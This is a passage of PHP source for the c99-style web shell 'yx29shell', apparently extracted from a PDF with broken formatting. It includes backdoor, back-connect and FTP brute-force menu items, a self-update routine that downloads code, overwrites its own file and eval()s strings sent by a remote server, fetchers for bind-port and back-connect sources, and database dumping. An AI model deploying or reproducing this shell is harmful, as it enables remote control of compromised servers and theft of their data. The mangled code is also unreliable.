array("milw0rm it!",$millink),
array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"),
array("Word-Lists","http://darkc0de.com/wordlists/"),
array("Toolz",$surl."act=tools&d=%d"),
array("Self-Kill",$surl."act=selfremove"),
array("Feedback",$surl."act=feedback"),
array("Update",$surl."act=update"),
array("About",$surl."act=about")
);

if (!$win) {
$quicklaunch2[] = array("<br>FTP-Brute",$surl."act=ftpquickbrute&d=%d");
$quicklaunch2[] = array("Backdoor",$surl."act=shbd");
$quicklaunch2[] = array("Back-Connect",$surl."act=backc");
}

```

```

//Highlight-code colors
$highlight_background = "#C0C0C0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";

```

```

@$f = $_REQUEST["f"];
@extract($_REQUEST["c99shcook"]);
//END OF CONFIGURATIONS

```

```

//STOP EDITING!

```

```

//Authentication
@set_time_limit(0);
$tmp = array();
foreach ($host_allow as $k=>$v) { $tmp[] = str_replace("\\*",".*",preg_quote($v)); }
$s = "^(".implode("|",$tmp).")$!";
if (!preg_match($s,getenv("REMOTE_ADDR")) and
!preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {

```

```

    exit("<a href=\"\$sh_mainurl\">\$sh_name</a>: Access Denied - Your host
(\".getenv("REMOTE_ADDR").") not allowed");
}
if (!empty(\$login)) {
    if (empty(\$md5_pass)) {\$md5_pass = md5(\$pass);}
    if ((\$_SERVER["PHP_AUTH_USER"] != \$login) or (md5(\$_SERVER["PHP_AUTH_PW"]) !=
\$md5_pass)) {
        header("WWW-Authenticate: Basic realm=\"\".\$sh_name.\" : \"\$login_txt.\"");
        header("HTTP/1.0 401 Unauthorized");
        exit(\$accessdeniedmess);
    }
}
if (\$act != "img") {
    \$lastdir = realpath(".");
    chdir(\$curdir);
    if (\$selfwrite or \$updatenow) {
        @ob_clean();
        c99sh_getupdate(\$selfwrite,1);
        exit;
    }
    \$sess_data = unserialize(\$_COOKIE["\$sess_cookie"]);
    if (!is_array(\$sess_data)) {\$sess_data = array();}
    if (!is_array(\$sess_data["copy"])) {\$sess_data["copy"] = array();}
    if (!is_array(\$sess_data["cut"])) {\$sess_data["cut"] = array();}
    if (!function_exists("c99getsource")) {
        function c99getsource(\$fn) {
            global \$c99sh_sourcesurl;
            \$array = array(
                "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
                "c99sh_bindport.c" => "c99sh_bindport_c.txt",
                "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
                "c99sh_backconn.c" => "c99sh_backconn_c.txt",
                "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
                "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
            );
            \$name = \$array[\$fn];
            if (\$name) {return file_get_contents(\$c99sh_sourcesurl.\$name);}
            else {return FALSE;}
        }
    }
}

```

```

}
if (!function_exists("c99sh_getupdate")) {
    function c99sh_getupdate($update = TRUE) {
        $url = $GLOBALS["c99sh_updateurl"]."?
version=".urlencode(base64_encode($GLOBALS["sh_ver"]))."&updatenow="
($updatenow?"1":"0");
        $data = @file_get_contents($url);
        if (!$data) {return "Can't connect to update-server!";}
        else {
            $data = ltrim($data);
            $string = substr($data,3,ord($data{2}));
            if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
            if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
            if ($data{0} == "\x99" and $data{1} == "\x03") {
                $string = explode("|",$string);
                if ($update) {
                    $confvars = array();
                    $sourceurl = $string[0];
                    $source = file_get_contents($sourceurl);
                    if (!$source) {return "Can't fetch update!";}
                    else {
                        $fp = fopen(__FILE__,"w");
                        if (!$fp) {return "Local error: can't write update to ".__FILE__." You may download
yx29shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
                        else {
                            fwrite($fp,$source);
                            fclose($fp);
                            return "Thanks! Update completed.";
                        }
                    }
                }
            }
            else {return "New version are available: ".$string[1];}
        }
        elseif ($data{0} == "\x99" and $data{1} == "\x04") {
            eval($string);
            return 1;
        }
        else {return "Error in protocol: segmentation failed! (".$data.") ";}
    }
}

```

```

}
}
if (!function_exists("c99_buff_prepare")) {
    function c99_buff_prepare() {
        global $sess_data;
        global $act;
        foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] =
str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
        foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] =
str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
        $sess_data["copy"] = array_unique($sess_data["copy"]);
        $sess_data["cut"] = array_unique($sess_data["cut"]);
        sort($sess_data["copy"]);
        sort($sess_data["cut"]);
        if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v)
{unset($sess_data["copy"][$k]); }}}
        else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v)
{unset($sess_data["cut"][$k]); }}}
    }
}
c99_buff_prepare();
if (!function_exists("c99_sess_put")) {
    function c99_sess_put($data) {
        global $sess_cookie;
        global $sess_data;
        c99_buff_prepare();
        $sess_data = $data;
        $data = serialize($data);
        setcookie($sess_cookie,$data);
    }
}
foreach (array("sort","sql_sort") as $v) {
    if (!empty($_GET[$v])) {$_$v = $_GET[$v];}
    if (!empty($_POST[$v])) {$_$v = $_POST[$v];}
}
if ($sort_save) {
    if (!empty($sort)) {setcookie("sort",$sort);}
    if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
}

```

```

if (!function_exists("str2mini")) {
    function str2mini($content,$len) {
        if (strlen($content) > $len) {
            $len = ceil($len/2) - 2;
            return substr($content, 0,$len)."..."substr($content,-$len);
        } else {return $content;}
    }
}

if (!function_exists("view_size")) {
    function view_size($size) {
        if (!is_numeric($size)) { return FALSE; }
        else {
            if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
            elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
            elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
            else {$size = $size . " B";}
            return $size;
        }
    }
}

if (!function_exists("fs_copy_dir")) {
    function fs_copy_dir($d,$t) {
        $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
        if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
        $h = opendir($d);
        while (($o = readdir($h)) !== FALSE) {
            if (($o != ".") and ($o != "..")) {
                if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret =
copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
                else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o);
fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
                if (!$ret) {return $ret;}
            }
        }
        closedir($h);
        return TRUE;
    }
}

if (!function_exists("fs_copy_obj")) {

```

```

function fs_copy_obj($d,$t) {
    $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
    $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
    if (!is_dir(dirname($t))) {mkdir(dirname($t));}
    if (is_dir($d)) {
        if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
        if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
        return fs_copy_dir($d,$t);
    }
    elseif (is_file($d)) { return copy($d,$t); }
    else { return FALSE; }
}
}
if (!function_exists("fs_move_dir")) {
    function fs_move_dir($d,$t) {
        $h = opendir($d);
        if (!is_dir($t)) {mkdir($t);}
        while (($o = readdir($h)) !== FALSE) {
            if (($o != ".") and ($o != "..")) {
                $ret = TRUE;
                if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret =
copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
                else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and
fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret =
FALSE;}}
                if (!$ret) {return $ret;}
            }
        }
        closedir($h);
        return TRUE;
    }
}
if (!function_exists("fs_move_obj")) {
    function fs_move_obj($d,$t) {
        $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
        $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
        if (is_dir($d)) {
            if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
            if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}

```

```

    return fs_move_dir($d,$t);
}
elseif (is_file($d)) {
    if(copy($d,$t)) {return unlink($d);}
    else {unlink($t); return FALSE;}
}
else {return FALSE;}
}
}
}
if (!function_exists("fs_rmdir")) {
function fs_rmdir($d) {
    $h = opendir($d);
    while (($o = readdir($h)) !== FALSE) {
        if (($o != ".") and ($o != "..")) {
            if (!is_dir($d.$o)) {unlink($d.$o);}
            else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
        }
    }
    closedir($h);
    rmdir($d);
    return !is_dir($d);
}
}
if (!function_exists("fs_rmobj")) {
function fs_rmobj($o) {
    $o = str_replace("\\", DIRECTORY_SEPARATOR, $o);
    if (is_dir($o)) {
        if (substr($o, -1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
        return fs_rmdir($o);
    }
    elseif (is_file($o)) {return unlink($o);}
    else {return FALSE;}
}
}
if (!function_exists("tabsort")) {
function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}
}
if (!function_exists("view_perms")) {
function view_perms($mode) {

```

```

if (($mode & 0xC000) === 0xC000) {$type = "s";}
elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
else {$type = "?";}
$owner["read"] = ($mode & 00400)?"r":"-";
$owner["write"] = ($mode & 00200)?"w":"-";
$owner["execute"] = ($mode & 00100)?"x":"-";
$group["read"] = ($mode & 00040)?"r":"-";
$group["write"] = ($mode & 00020)?"w":"-";
$group["execute"] = ($mode & 00010)?"x":"-";
$world["read"] = ($mode & 00004)?"r":"-";
$world["write"] = ($mode & 00002)?"w":"-";
$world["execute"] = ($mode & 00001)?"x":"-";
if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
return $type.join("",$owner).join("",$group).join("",$world);
}
}
if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function
posix_getpwuid($uid) {return FALSE;}}
if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function
posix_getgrgid($gid) {return FALSE;}}
if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function
posix_kill($gid) {return FALSE;}}
if (!function_exists("parse_perms")) {
function parse_perms($mode) {
if (($mode & 0xC000) === 0xC000) {$t = "s";}
elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
else {$t = "?";}
}
}

```

```

    $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100)
> 0;
    $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010)
> 0;
    $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode &
00001) > 0;
    return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
}
}
if (!function_exists("parsesort")) {
function parsesort($sort) {
    $one = intval($sort);
    $second = substr($sort,-1);
    if ($second != "d") {$second = "a";}
    return array($one,$second);
}
}
if (!function_exists("view_perms_color")) {
function view_perms_color($o) {
    if (!is_readable($o)) {return "<font color=red>.view_perms(fileperms($o))."</font>";}
    elseif (!is_writable($o)) {return "<font color=white>.view_perms(fileperms($o))."</font>";}
    else {return "<font color=green>.view_perms(fileperms($o))."</font>";}
}
}
if (!function_exists("mysql_dump")) {
function mysql_dump($set) {
    global $sh_ver;
    $sock = $set["sock"];
    $db = $set["db"];
    $print = $set["print"];
    $nl2br = $set["nl2br"];
    $file = $set["file"];
    $add_drop = $set["add_drop"];
    $tabs = $set["tabs"];
    $onlytabs = $set["onlytabs"];
    $ret = array();
    $ret["err"] = array();
    if (!is_resource($sock)) {echo("Error: \${sock} is not valid resource.");}
    if (empty($db)) {$db = "db";}
}
}

```

```

if (empty($print)) {$print = 0;}
if (empty($nl2br)) {$nl2br = 0;}
if (empty($add_drop)) {$add_drop = TRUE;}
if (empty($file)) {
    $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
}
if (!is_array($tabs)) {$tabs = array();}
if (empty($add_drop)) {$add_drop = TRUE;}
if (sizeof($tabs) == 0) {
    //Retrieve tables-list
    $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
    if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] =
$row[0];}}
}
$out = "
# Dumped by ".$sh_name."
#
# Host settings:
# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")."
("".getenv("SERVER_NAME").")."
# Date: ".date("d.m.Y H:i:s")."
# DB: \"\".$db.\"\"
#-----";
$c = count($onlytabs);
foreach($tabs as $tab) {
    if ((in_array($tab,$onlytabs)) or (!$c)) {
        if ($add_drop) {$out .= "DROP TABLE IF EXISTS ``.$tab.``;\n";}
        //Receieve query for create table structure
        $res = mysql_query("SHOW CREATE TABLE ``.$tab.``", $sock);
        if (!$res) {$ret["err"][] = mysql_error();}
        else {
            $row = mysql_fetch_row($res);
            $out .= $row["1"].";\n\n";
            //Receieve table variables
            $res = mysql_query("SELECT * FROM `.$tab`", $sock);
            if (mysql_num_rows($res) > 0) {
                while ($row = mysql_fetch_assoc($res)) {
                    $keys = implode("`", array_keys($row));
                    $values = array_values($row);

```



```

if ($sock) {$result = mysql_query($query,$sock);}
else {$result = mysql_query($query);}
$array = array();
while ($row = mysql_fetch_array($result)) {$array[] = $row;}
mysql_free_result($result);
return $array;
}
}
if (!function_exists("mysql_smarterror")) {
function mysql_smarterror($type,$sock) {
if ($sock) {$error = mysql_error($sock);}
else {$error = mysql_error();}
$error = htmlspecialchars($error);
return $error;
}
}
if (!function_exists("mysql_query_form")) {
function mysql_query_form() {
global
$submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error)
{$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
if ((!$submit) or ($sql_act)) {
echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if
(($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":
</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."
</textarea><br><br><input type=hidden name=act value=sql><input type=hidden
name=sql_act value=query><input type=hidden name=sql_tbl
value=\"\".htmlspecialchars($sql_tbl).\"\"><input type=hidden name=submit value=\"1\"><input
type=hidden name=\"sql_goto\" value=\"\".htmlspecialchars($sql_goto).\"\"><input type=submit
name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
if ($tbl_struct) {
echo "<td valign=\"top\"><b>Fields:</b><br>";
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#"
onclick=\"document.c99sh_sqlquery.sql_query.value+=\"\".$name.\"\";\"><b>".$name."</b></a>
<br>";}
echo "</td></tr></table>";
}
}
}

```

```

}
if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
}
}
if (!function_exists("mysql_create_db")) {
function mysql_create_db($db,$sock="") {
    $sql = "CREATE DATABASE `".addslashes($db)."`;";
    if ($sock) {return mysql_query($sql,$sock);}
    else {return mysql_query($sql);}
}
}
if (!function_exists("mysql_query_parse")) {
function mysql_query_parse($query) {
    $query = trim($query);
    $arr = explode (" ", $query);
    $types = array(
        "SELECT"=>array(3,1),
        "SHOW"=>array(2,1),
        "DELETE"=>array(1),
        "DROP"=>array(1)
    );
    $result = array();
    $op = strtoupper($arr[0]);
    if (is_array($types[$op])) {
        $result["proportions"] = $types[$op];
        $result["query"] = $query;
        if ($types[$op] == 2) {
            foreach($arr as $k=>$v) {
                if (strtoupper($v) == "LIMIT") {
                    $result["limit"] = $arr[$k+1];
                    $result["limit"] = explode(" ", $result["limit"]);
                    if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
                    unset($arr[$k],$arr[$k+1]);
                }
            }
        }
    }
    else {return FALSE;}
}
}

```

```

}
if (!function_exists("c99fsearch")) {
function c99fsearch($d) {
    global $found;
    global $found_d;
    global $found_f;
    global $search_i_f;
    global $search_i_d;
    global $a;
    if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
    $h = opendir($d);
    while (($f = readdir($h)) != FALSE) {
        if($f != "." && $f != "..") {
            $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) != FALSE) ||
($a["name_regexp"] and ereg($a["name"],$f));
            if (is_dir($d.$f)) {
                $search_i_d++;
                if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
                if (!is_link($d.$f)) {c99fsearch($d.$f);}
            }
            else {
                $search_i_f++;
                if ($bool) {
                    if (!empty($a["text"])) {
                        $r = @file_get_contents($d.$f);
                        if ($a["text_ww0"]) {$a["text"] = " ".trim($a["text"])." "};
                        if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
                        if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
                        else {$bool = strpos(" ".$r,$a["text"],1);}
                        if ($a["text_not"]) {$bool = !$bool;}
                        if ($bool) {$found[] = $d.$f; $found_f++;}
                    }
                    else {$found[] = $d.$f; $found_f++;}
                }
            }
        }
    }
}
closedir($h);
}

```

```

}
if ($act == "gofile") {
    if (is_dir($f)) { $act = "ls"; $d = $f; }
    else { $act = "f"; $d = dirname($f); $f = basename($f); }
}
//Sending Headers
@ob_start();
@ob_implicit_flush(0);
function onphpshutdown() {
    global $gzipencode,$ft;
    if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
        $v = @ob_get_contents();
        @ob_end_clean();
        @ob_start("ob_gzHandler");
        echo $v;
        @ob_end_flush();
    }
}
function c99shexit() {
    onphpshutdown();
    exit;
}
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", FALSE);
header("Pragma: no-cache");
//Setting Temporary Dir
if (empty($tmpdir)) {
    $tmpdir = ini_get("upload_tmp_dir");
    if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
}
$tmpdir = realpath($tmpdir);
$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .=
DIRECTORY_SEPARATOR;}
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
else {$tmpdir_logs = realpath($tmpdir_logs);}
//Getting Status

```

```

function showstat($stat) {
    if ($stat=="on") { return "<font color=#00FF00><b>ON</b></font>"; }
    else { return "<font color=#FF9900><b>OFF</b></font>"; }
}
function testperl() {
    if (ex('perl -h')) { return showstat("on"); }
    else { return showstat("off"); }
}
function testfetch() {
    if(ex('fetch --help')) { return showstat("on"); }
    else { return showstat("off"); }
}
function testwget() {
    if (ex('wget --help')) { return showstat("on"); }
    else { return showstat("off"); }
}
function testoracle() {
    if (function_exists('ocilogon')) { return showstat("on"); }
    else { return showstat("off"); }
}
function testpostgresql() {
    if (function_exists('pg_connect')) { return showstat("on"); }
    else { return showstat("off"); }
}
function testmssql() {
    if (function_exists('mssql_connect')) { return showstat("on"); }
    else { return showstat("off"); }
}
function testcurl() {
    if (function_exists('curl_version')) { return showstat("on"); }
    else { return showstat("off"); }
}
function testmysql() {
    if (function_exists('mysql_connect')) { return showstat("on"); }
    else { return showstat("off"); }
}
function showdisablefunctions() {
    if ($disablefunc=@ini_get("disable_functions")){ return "<font color=#FF9900>
<b>".$disablefunc."</b></font>"; }
}

```

```

else { return "<font color=#00FF00><b>NONE</b></b></font>"; }
}
//Getting Safe Mode Status
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
    $safemode = TRUE;
    $hsafemode = "<font color=#3366FF><b>SAFE MODE is ON (Secure)</b></font>";
}
else {
    $safemode = FALSE;
    $hsafemode = "<font color=#FF9900><b>SAFE MODE is OFF (Not Secure)</b></font>";
}
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {
    $openbasedir = TRUE;
    $hopenbasedir = "<font color=red>".$v."</font>";
}
else {
    $openbasedir = FALSE;
    $hopenbasedir = "<font color=green>OFF (not secure)</font>";
}
$sort = htmlspecialchars($sort);
if (empty($sort)) {$sort = $sort_default;}
$sort[1] = strtolower($sort[1]);
$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE))
{$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a
href='\"'\".\"$surl.\"act=phpinfo\" target=\"_blank\"><b><u>PHP/\".phpversion().\"</u></b>
</a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
@ini_set("highlight.bg",$highlight_bg);
@ini_set("highlight.comment",$highlight_comment);
@ini_set("highlight.default",$highlight_default);
@ini_set("highlight.html",$highlight_html);
@ini_set("highlight.keyword",$highlight_keyword);
@ini_set("highlight.string",$highlight_string);
if (!is_array($sactbox)) { $sactbox = array(); }
$dspace = $sact = htmlspecialchars($sact);
$disp_fullpath = $ls_arr = $notls = null;
$ud = urlencode($d);

```

```

//Directory
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath(".");}
elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\", "\\",$d);
$dispd = htmlspecialchars($d);
/***** HTML START *****/
echo $html_start;
echo "<div><h3>$sh_name</h3>.: No System is Perfectly Safe :.</div>\n";
echo "<table id=pagebar><tr><td width=50%><p>".
    "Software : ".$DISP_SERVER_SOFTWARE ." - <a href=act=phpini>php.ini</a><br>".
    "$hsafemode<br>".
    "OS : ".php_uname()."<br>";
if (!$win) { echo "User ID : ".myshellexec("id"); }
else { echo "User : " . get_current_user(); }
echo "</p></td>".
    "<td width=50%><p>Server IP : <a
href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostb
yname($_SERVER["HTTP_HOST"])."</a> - ".
    "Your IP : <a
href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOT
E_ADDR"]."</a><br>";
if($win){echo "Drives : ".disp_drives($d,$surl)."<br>";}
echo "Freespace : ".disp_freespace($d);
echo "</p></td></tr>";
echo "<tr><td colspan=2><p>";
echo "MySQL: ".testmysql()." MSSQL: ".testmssql()." Oracle: ".testoracle()." MSSQL:
".testmssql()." PostgreSQL: ".testpostgresql().
    " cURL: ".testcurl()." WGet: ".testwget()." Fetch: ".testfetch()." Perl: ".testperl()."<br>";
echo "Disabled Functions: ".showdisablefunctions();
echo "</p></td></tr>";
echo "<tr><td colspan=2 id=mainmenu>";
if (count($quicklaunch2) > 0) {
    foreach($quicklaunch2 as $item) {
        $item[1] = str_replace("%d",urlencode($d),$item[1]);
        $item[1] = str_replace("%sort",$sort,$item[1]);
        $v = realpath($d.."");

```

```

if (empty($v)) {
    $a = explode(DIRECTORY_SEPARATOR,$d);
    unset($a[count($a)-2]);
    $v = join(DIRECTORY_SEPARATOR,$a);
}
$item[1] = str_replace("%upd",urlencode($v),$item[1]);
echo "<a href=\"". $item[1]. "\">". $item[0]. "</a>\n";
}
}
echo "</td><tr><td colspan=2 id=mainmenu>";
if (count($quicklaunch1) > 0) {
    foreach($quicklaunch1 as $item) {
        $item[1] = str_replace("%d",urlencode($d),$item[1]);
        $item[1] = str_replace("%sort",$sort,$item[1]);
        $v = realpath($d.."");
        if (empty($v)) {
            $a = explode(DIRECTORY_SEPARATOR,$d);
            unset($a[count($a)-2]);
            $v = join(DIRECTORY_SEPARATOR,$a);
        }
        $item[1] = str_replace("%upd",urlencode($v),$item[1]);
        echo "<a href=\"". $item[1]. "\">". $item[0]. "</a>\n";
    }
}
echo "</td></tr><tr><td colspan=2>";
echo "<p>";
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b) {
    $t = ""; $j = 0;
    foreach ($e as $r) {
        $t.= $r.DIRECTORY_SEPARATOR;
        if ($j == $i) { break; }
        $j++;
    }
    echo "<a href=\"". $surl. "act=ls&d=".urlencode($t). "&sort=".$sort. "\"><font
color=yellow>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>";
    $i++;
}

```

```

echo " - ";
if (is_writable($d)) {
    $wd = TRUE;
    $swdt = "<font color=#00FF00>[OK]</font>";
    echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
}
else {
    $wd = FALSE;
    $swdt = "<font color=red>[Read-Only]</font>";
    echo "<b>".view_perms_color($d)."</b>";
}
?>
</p>
<div>
<form method="POST"><input type=hidden name=act value="ls">
Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input
type=submit value="Go">
</form>
</div>
</td></tr></table>
<?php
//Information Table
echo "<table id=maininfo><tr><td width=\"100%\">\n";
//Action
if ($sact == "") { $sact = $dspact = "ls"; }
if ($sact == "phpini" ) { get_phpini(); }
if ($sact == "sql") {
    $sql_surl = $surl."act=sql";
    if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
    if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
    if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
    if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
    if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
    $sql_surl .= "&";
    echo "<h4>Attention! SQL-Manager is <u>NOT</u> a ready module! Don't reports bugs.
</h4>".
        "<table>".
        "<tr><td width=\"100%\" colspan=2>";
    if ($sql_server) {

```

```

$sql_sock = mysql_connect($sql_server.":". $sql_port, $sql_login, $sql_passwd);
$error = mysql_error();
@mysql_select_db($sql_db,$sql_sock);
if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock);
$error = mysql_error();}
}
else {$sql_sock = FALSE;}
echo ".: SQL Manager :.<br>";
if (!$sql_sock) {
if (!$sql_server) {echo "NO CONNECTION";}
else {echo "Can't connect! ".$error;}
}
else {
$sqlquicklaunch = array();
$sqlquicklaunch[] =
array("Index",$url."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspe
cialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecia
lchars($sql_port)."&");
$sqlquicklaunch[] = array("Query",$url."sql_act=query&sql_tbl=".urlencode($sql_tbl));
$sqlquicklaunch[] = array("Server-
status",$url."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialch
ars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars
($sql_port)."&sql_act=serverstatus");
$sqlquicklaunch[] = array("Server
variables",$url."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspeca
lchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialch
ars($sql_port)."&sql_act=servervars");
$sqlquicklaunch[] =
array("Processes",$url."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".ht
mlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".html
specialchars($sql_port)."&sql_act=processes");
$sqlquicklaunch[] = array("Logout",$url."act=sql");
echo "MySQL ".$mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in
.htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as
.htmlspecialchars($sql_login)."@" .htmlspecialchars($sql_server)." (password -
\".htmlspecialchars($sql_passwd).\"<br>";
if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a
href=\"".$item[1].\">".$item[0].\"</a> ] ";}}
}

```

```

echo "</td></tr><tr>";
if (!$sql_sock) {
